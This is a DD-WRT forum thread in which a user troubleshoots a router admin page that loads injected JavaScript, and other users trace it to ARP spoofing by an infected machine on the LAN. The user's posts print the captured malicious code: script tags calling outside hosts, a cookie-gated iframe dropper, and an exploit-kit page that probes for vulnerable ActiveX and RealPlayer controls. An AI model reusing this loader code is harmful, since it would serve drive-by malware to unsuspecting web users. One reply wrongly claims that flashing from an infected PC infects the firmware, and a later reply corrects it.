Trojan/virus PC is infecting DD-WRT. Help

Post new topic   Reply to topic    DD-WRT Forum Index -> Broadcom SoC based Hardware
Goto page 1, 2  Next
Author Message
Jabroni
DD-WRT User


Joined: 17 Jun 2006
Posts: 88

PostPosted: Fri Oct 17, 2008 17:58    Post subject: Trojan/virus PC is infecting DD-WRT. Help Reply with quote
This has happend me before, and Im not sure how they are doing it. I have a WRT600N router flashed with dd-wrt svn build 10431. When I try to get onto a restricted page on the router (ie Administration) I rappidly get the pink screen that says:

Code:

Authorization required. please note that the default username is "root" in all newer releases


Analyzing the html code of it, it references to another page to try to load a javascript


Code:

<script language="javascript" SRC="http://sun.ads2008.info/vip.js"></script>                                     <HTML><HEAD><TITLE>401 Unauthorized</TITLE></HEAD>
<BODY BGCOLOR="#cc9999"><H4>401 Unauthorized</H4>
Authorization required. please note that the default username is "root" in all newer releases
</BODY></HTML>


The url it tries to load is the Status_Router.asp.

I can however still access the router via telnet and execute command via shell, but from web access is unsable, and the page it redirects to tries to install malware if used with IE. Any idea how this trojans/virus are infecting the dd-wrt ?? At first I thought it would be dns poisoning, but this version has the already patched dnsmask....

UPDATES:

* note: the admin password wasnt the default one.
** after analyzing the pages it takes, it takes you to a japanesse/chinesse server
Sponsor
soulstace
DD-WRT Guru


Joined: 04 Aug 2007
Posts: 6427

PostPosted: Fri Oct 17, 2008 18:06    Post subject: Reply with quote
Scan your PC for malware Question

Does it happen with other web browsers such as Firefox, Opera, Safari, Chrome, etc?
Jabroni
DD-WRT User


Joined: 17 Jun 2006
Posts: 88

PostPosted: Fri Oct 17, 2008 18:10    Post subject: Reply with quote
soulstace wrote:
Scan your PC for malware Question

Does it happen with other web browsers such as Firefox, Opera, Safari, Chrome, etc?


yup... Firefox,IE and Chrome.. and on all machines that are connected onto the router...


Ok I rebooted and it seems that it started working again.. like if the ddwrt had the 'infection' on memory only
soulstace
DD-WRT Guru


Joined: 04 Aug 2007
Posts: 6427

PostPosted: Fri Oct 17, 2008 18:31    Post subject: Reply with quote
Sorry, I don't know what to tell you. No problems here.

Make sure SPI firewall is enabled. If it already is, then you likely have some problem on the LAN.
Jabroni
DD-WRT User


Joined: 17 Jun 2006
Posts: 88

PostPosted: Mon Jan 05, 2009 20:28    Post subject: Reply with quote
This is happening me several times yet...

Heres the html it outputs now (points to different url of the javascript)

Code:

<script language="javascript" type="text/javascript" src="http://vc.zaqaab.cn/vc.js"></script>                                                                                                                                   <HTML><HEAD><TITLE>401 Unauthorized</TITLE></HEAD>
<BODY BGCOLOR="#cc9999"><H4>401 Unauthorized</H4>
Authorization required. please note that the default username is "root" in all newer releases
</BODY></HTML>


the javascript content is

Code:

var cookieString=document.cookie;
var start=cookieString.indexOf("cookiesleepv");
if(start!=-1){}else{var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie="cookiesleepv=test;expires="+expires.toGMTString();
document.write("<iframe src=http://vc.zaqaab.cn/vc.htm width=50 height=0 border=0></iframe>");}


And if I check the vc.htm it injects via JS
Code:

<script language="javascript" type="text/javascript" src="http://vc.zaqaab.cn/vc.js"></script>                                                                                         <html>
<script>
document.write("<iframe width=100 height=0 src=flash.htm></iframe>");
document.write("<iframe width=100 height=0 src=xx.htm></iframe>");
document.write("<iframe width=100 height=0 src=14.htm></iframe>");
if(navigator.userAgent.toLowerCase().indexOf("msie 7")>0)
document.write("<iframe src=tt.htm width=100 height=0></iframe>");
try{var d;
var lz=new ActiveXObject("GLI"+"EDown.I"+"EDown.1");}
catch(d){};                     
finally{if(d!="[object Error]"){document.write("<iframe width=100 height=0 src=lz.htm></iframe>");}}
try{var b;
var of=new ActiveXObject("snpvw.Snap"+"shot Viewer Control.1");}
catch(b){};                     
finally{if(b!="[object Error]"){document.write("<iframe width=100 height=0 src=office.htm></iframe>");}}
try{var d;
var lz=new ActiveXObject("GLI"+"EDown.I"+"EDown.1");}
catch(d){};                     
finally{if(d!="[object Error]"){document.write("<iframe width=100 height=0 src=lz.htm></iframe>");}}
function Game()
{
Sameee = "IERPCtl.IERPCtl.1";
try
{
Gime = new ActiveXObject(Sameee);
}catch(error){return;}
Tellm = Gime.PlayerProperty("PRODUCTVERSION");
if(Tellm<="6.0.14.552")
document.write("<iframe width=100 height=0 src=real.htm></iframe>");
else
document.write("<iframe width=100 height=0 src=real.html></iframe>");
}
Game();
</script><script type="text/javascript" src="http://js.tongji.cn.yahoo.com/869209/ystat.js"></script><noscript><a href="http://tongji.cn.yahoo.com"><img src="http://img.tongji.cn.yahoo.com/869209/ystat.gif"/></a></noscript>
</html>



I have changed the default http internal port to 8080, changed the default username (root) and password, disabled UPNP, snmp, and all unnecesary services.

Im running
Firmware: DD-WRT v24-sp2 (11/25/0Cool mega
on a Linksys WRT600N (since it was the last stable build for this unit).

Ive tried different browsers, machines, and same happends. Any other way to debug why it wont even let me log in to the router (when I click on a tab, instead of asking me for the username/password it takes me directly to the pink 401 page with the infected javascript.

Anyone else experienced something similar?
LOM
DD-WRT Guru


Joined: 28 Dec 2008
Posts: 7647

PostPosted: Mon Jan 05, 2009 21:33    Post subject: Reply with quote
Jabroni wrote:

yup... Firefox,IE and Chrome.. and on all machines that are connected onto the router...


On all computers connected to that LAN!

They are infected with the trojan JS.Agent.xx where xx
is a combo of two letters.
Jabroni
DD-WRT User


Joined: 17 Jun 2006
Posts: 88

PostPosted: Tue Jan 06, 2009 1:13    Post subject: Reply with quote
LOM wrote:
Jabroni wrote:

yup... Firefox,IE and Chrome.. and on all machines that are connected onto the router...


On all computers connected to that LAN!

They are infected with the trojan JS.Agent.xx where xx
is a combo of two letters.


Ok I just found how they do it.. I found this page:
http://topfueber.de/2008/07/mxcontent-typecn443-nice-trojan-how-to-get-rid-of-it/#english

Quote:

The cause is a trojan horse (virus) on another computer in your network!

This other computer is telling your PC that it is the gateway to the internet by modifying its hardware address (MAC). Your computer is in consequence sending all traffic to the infected PC which forwards it to the internet and filters it in order to put its malicious code.

You can find out which computer is the evil one by typing following into your command line:
arp -a
In the appearing table search for a double assigned physical address which is once assigned to the gateway IP address and once assigned to another IP.
Find out which computer is the other IP and you will have the virus host.
Scan that one for virus and malware (we are just about to conduct that scan).


And I guess that the JS it injects make something break on the DDWRT and thats why it responds with an invalid username/password
yeti
DD-WRT Novice


Joined: 19 May 2008
Posts: 13

PostPosted: Wed Jan 07, 2009 1:45    Post subject: Reply with quote
A Trojan Horse?!?

Sounds like an entire Trojan Stable to me!
tonny57
DD-WRT Novice


Joined: 01 Jun 2010
Posts: 1

PostPosted: Tue Jun 01, 2010 10:49    Post subject: Reply with quote
Smile Hi! Maybe you should change your antivirus. I use a version that makes me no problem and I really have no virus. So I recommand you to use it. You can download it from here kaspersky security 7
Masterman
DD-WRT Guru


Joined: 24 Aug 2009
Posts: 2070
Location: South Florida

PostPosted: Tue Jun 01, 2010 12:07    Post subject: Reply with quote
Best A/V I have ever used is Avast. Not only is it free, but it will do a boot-time scan as well as screen saver scans...Great piece of software. Been using it for 3 years..

http://www.avast.com/index#tab2

_________________
Optware, the Right Way
Asus RT-AC68U
Asus RT-N66U
Asus RT-N10
Asus RT-N12
Asus RT-N16 x5
Asus WL520gU
Engenious ECB350
Linksys WRT600Nv1.1
Linksys WRT610Nv1
Linksys E2000
Netgear WNDR3300
SonicWall NSA220W
SonicWall TZ215W
SonicWall TZ205W
SonicWall TZ105W
redhawk0
DD-WRT Guru


Joined: 04 Jan 2007
Posts: 11563
Location: Wherever the wind blows- North America

PostPosted: Tue Jun 01, 2010 12:29    Post subject: Reply with quote
AVG is also very good...and free.

www.avg.com/free

I've been using it on my home PC for years...never a problem with Virii.

redhawk

_________________
The only stupid question....is the unasked one.
dave-levy
DD-WRT Novice


Joined: 12 Apr 2010
Posts: 16

PostPosted: Tue Jun 01, 2010 12:35    Post subject: Reply with quote
just to be clear here, does this occurence mean the software is actually loaded into router memory, or is this purely a pc problem?
redhawk0
DD-WRT Guru


Joined: 04 Jan 2007
Posts: 11563
Location: Wherever the wind blows- North America

PostPosted: Tue Jun 01, 2010 12:43    Post subject: Reply with quote
dave-levy wrote:
just to be clear here, does this occurence mean the software is actually loaded into router memory, or is this purely a pc problem?


This is really an archaic post (2008)....but the way I understand it was if the PC is infected, then when you flashed the router, it injected the FW code with a virus....someone correct me if I am wrong.

So...by protecting your PC, you can also protect your router....there are other malware problems with router FWs....but BS had patched the FW to remedy this. Read the announcements about the Milworm Exploit. (its in my recommended FW post)

redhawk

_________________
The only stupid question....is the unasked one.
oxygenx
DD-WRT Guru


Joined: 11 Nov 2007
Posts: 566

PostPosted: Tue Jun 01, 2010 13:39    Post subject: Reply with quote
redhawk0 wrote:

This is really an archaic post (2008)....but the way I understand it was if the PC is infected, then when you flashed the router, it injected the FW code with a virus....someone correct me if I am wrong.

no. it hast nothing to do with dd-wrt. a other computer on the lan spoofed the arp entries of the gateway (in this case a dd-wrt router) and then proxied + modified all loaded html pages to infect more computers.
frater
DD-WRT Guru


Joined: 07 Jun 2006
Posts: 2777

PostPosted: Tue Jun 01, 2010 14:42    Post subject: Reply with quote
I'm not saying it's impossible, but it's very unlikely the DD-WRT itself is infected. Reading the way the OP is analyzing and drawing conclusions it becomes even less and less likely it has anything to do with DD-WRT.
_________________
Asus RT16N + OTRW
Kingston 4GB USB-disk 128 MB swap + 1.4GB ext3 on /opt + 2 GB ext3 on /mnt
Copperjet 1616 modem in ZipB-config
Asterisk, pixelserv & Pound running on router
Another Asus RT16N as WDS-bridge

DD-WRT v24-sp2 vpn (c) 2010 NewMedia-NET GmbH
Release: 12/16/10 (SVN revision: 15758M)
Goto page 1, 2  Next Display posts from previous:    Page 1 of 2
Post new topic   Reply to topic    DD-WRT Forum Index -> Broadcom SoC based Hardware All times are GMT

Navigation

 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum